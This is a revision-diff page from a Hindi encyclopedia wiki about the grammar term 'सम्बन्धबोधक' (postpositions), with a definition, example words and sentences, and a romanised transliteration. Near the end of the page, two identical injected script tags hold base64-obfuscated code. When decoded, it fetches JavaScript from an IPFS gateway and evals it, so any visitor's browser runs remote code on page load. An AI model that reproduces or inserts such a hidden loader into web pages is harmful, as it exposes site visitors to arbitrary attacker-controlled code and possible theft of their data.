Difference between revisions of "सम्बन्धबोधक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
*सम्बन्धबोधक [[सार्थक शब्द (व्याकरण)|सार्थक शब्दों]] के आठ भेदों में एक भेद है।
 
*सम्बन्धबोधक [[सार्थक शब्द (व्याकरण)|सार्थक शब्दों]] के आठ भेदों में एक भेद है।
 
*[[व्याकरण (व्यावहारिक)|व्याकरण]] में सम्बन्धबोधक एक [[अविकारी शब्द]] है।  
 
*[[व्याकरण (व्यावहारिक)|व्याकरण]] में सम्बन्धबोधक एक [[अविकारी शब्द]] है।  
*जो अविकारी शब्द [[संज्ञा (व्याकरण)|संज्ञा]] या [[सर्वनाम]] शब्दों के पहले या पीछे आकर उसका सम्बन्ध वाक्य के किसी अन्य [[शब्द (व्याकरण)|शब्द]] से कराते हैं, उन्हें सम्बन्धबोधक कहते हैं। जैसे, बिना, पूर्वक, और, वास्ते, तुल्य, समान, सरीखा, तक, सहित, लिए आदि। उदाहरण-
+
*जो अविकारी शब्द [[संज्ञा (व्याकरण)|संज्ञा]] या [[सर्वनाम]] शब्दों के पहले या पीछे आकर उसका सम्बन्ध वाक्य के किसी अन्य [[शब्द (व्याकरण)|शब्द]] से कराते हैं, उन्हें सम्बन्धबोधक कहते हैं।  
 +
*जैसे- बिना, पूर्वक, और, वास्ते, तुल्य, समान, सरीखा, तक, सहित, लिए आदि।  
 +
;<u>उदाहरण</u>
 
*राम के बिना मेरा कार्य नहीं होगा।
 
*राम के बिना मेरा कार्य नहीं होगा।
 
*सीता के समान अन्य कोई नारी नहीं है।
 
*सीता के समान अन्य कोई नारी नहीं है।
 
*मोहन अपनी पत्नी सहित घर गया है।
 
*मोहन अपनी पत्नी सहित घर गया है।
 
 
 
 
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 15: Line 18:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{व्याकरण}}
 
{{व्याकरण}}
[[Category:नया पन्ना]][[Category:व्याकरण]]
+
[[Category:व्याकरण]]
 +
[[Category:हिन्दी भाषा]][[Category:भाषा कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:14, 14 October 2011

  • sambandhabodhak sarthak shabdoan ke ath bhedoan mean ek bhed hai.
  • vyakaran mean sambandhabodhak ek avikari shabd hai.
  • jo avikari shabd sanjna ya sarvanam shabdoan ke pahale ya pichhe akar usaka sambandh vaky ke kisi any shabd se karate haian, unhean sambandhabodhak kahate haian.
  • jaise- bina, poorvak, aur, vaste, tuly, saman, sarikha, tak, sahit, lie adi.
udaharan
  • ram ke bina mera kary nahian hoga.
  • sita ke saman any koee nari nahian hai.
  • mohan apani patni sahit ghar gaya hai.

 


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>